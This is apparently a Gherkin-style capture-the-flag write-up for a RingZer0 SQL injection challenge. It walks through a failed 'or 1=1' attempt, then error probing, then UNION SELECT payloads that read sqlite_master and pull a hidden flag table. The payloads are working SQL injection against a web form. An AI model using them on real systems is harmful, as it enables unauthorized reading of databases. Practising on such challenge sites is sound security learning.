## Version 2.0
## language: en

Feature: thinking-outside-the-box-is-the-key-ringerzeroctf
  Site:
    https://ringzer0ctf.com/challenges/39
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Get the flag

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://ringzer0ctf.com/challenges/39
    """
    When I open the url with Chrome
    Then I see a login form
  Scenario: Fail:Sql-injection
    Given the form
    And knowing that answer is correct when It returns:
    """
    FLAG-*********************
    """
    When I try with a well known payload
    """
    ?id=2 or 1=1
    """
    Then I get "This is a test"
    And I don't solve the challenge

   Scenario: Success:Sql-injection
    Given that I inspected the functionality
    And tried with the payload
    """
    id=2'
    """
    Then I get "SQLite Database error please try again later."
    And I know that they are using a SQLite database
    When I use the following payload
    """
    2 union select 1,group_concat(sql,' ') from sqlite_master
    """
    Then I get the tables from the database
    And I see a table "ajklshfajks" with a column "flag"
    Then I use the following payload
    """
    2 union select 1,group_concat(flag,' ') from ajklshfajks
    """
    And I get the flag
    Then I solve the challenge
